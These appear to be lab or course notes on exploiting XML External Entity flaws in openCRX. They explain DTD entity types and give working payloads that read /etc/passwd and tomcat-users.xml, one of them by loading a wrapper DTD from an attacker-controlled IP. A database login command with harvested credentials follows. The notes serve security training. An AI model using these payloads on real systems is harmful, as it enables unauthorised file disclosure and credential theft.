XML parsing vulnerabilities can, at times, provide powerful primitives to an attacker.
Depending on the programming language an XML parser is written in, these primitives can eventually be chained together to achieve devastating effects such as:
- Information Disclosure
- Server-Side Request Forgery
- Denial of Service
- Remote Command Injection
- Remote Code Execution
Document Type Definitions Document Type Definitions (DTDs) are an interesting feature of XML.
- XML entity is a data structure typically containing valid XML code that will be referenced multiple times in a document
- Internal entities are locally defined within the DTD:
<!ENTITY test "<entity-value>test value</entity-value>"> - Private External entities are used when referencing data that is not defined locally:
<!ENTITY name SYSTEM "URI"> - Public External entities:
<!ENTITY name PUBLIC "public_id" "URI"> - Parameter Entities:
<!ENTITY % name SYSTEM "URI"> - Unparsed Entities:
<!ENTITY name SYSTEM "URI" NDATA TYPE>–> NDATA defines type, such as binary for non-PHP applications regarding I/O streams.
Exploiting XXE
- Inject into DTD entities –>
SYSTEM "file:///etc/passwd" - Inject into REST API using “application/xml”
- Find POST request that accepts XML and inject
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&lastname;</lastName>
<firstName>Test #1</firstName>
</org.opencrx.kernel.account1.Contact>
- Observe error –> If it contains verbose SQL, read through the error message.
- A
java.sql.SQLDataExceptionusually indicates a data error occurred when an SQL statement was executed. - Directory Listing:
<!ENTITY lastname SYSTEM "file:///">
Code Wrapping using CDATA and parameter entities
- /var/www/html/wrapper.dtd
<!ENTITY wrapper "%start;%file;%end;">
Payload
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///home/student/crx/apache-tomee-plus-7.0.5/conf/tomcat-users.xml" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.119.120/wrapper.dtd" >
%dtd;
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&wrapper;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>
Sensitive Files (Using file:// to search directories in Java):
- Search config files, batch files, database files and shell scripts.
file:///home/student/crx/apache-tomee-plus-7.0.5/conf/tomcat-users.xml- Access
/managerand deploy malicious WAR file –> does not work
- Access
file:///home/student/crx/data/hsqldb/dbmanager.sh- Contains credentials to access the HSQLDB (For Java)
file:///home/student/crx/data/hsqldb/crx.propertiesto determine ACL- No iptables since no RCE to determine if port is accessible
- Scan port to determine if application is running –> Use hsqldb.jar to connect
java -cp ./hsqldb.jar org.hsqldb.util.DatabaseManagerSwing --url jdbc:hsqldb:hsql://127.0.0.1:9001/CRX --user sa --password manager99- Can potentially query the database, but maybe also write a file?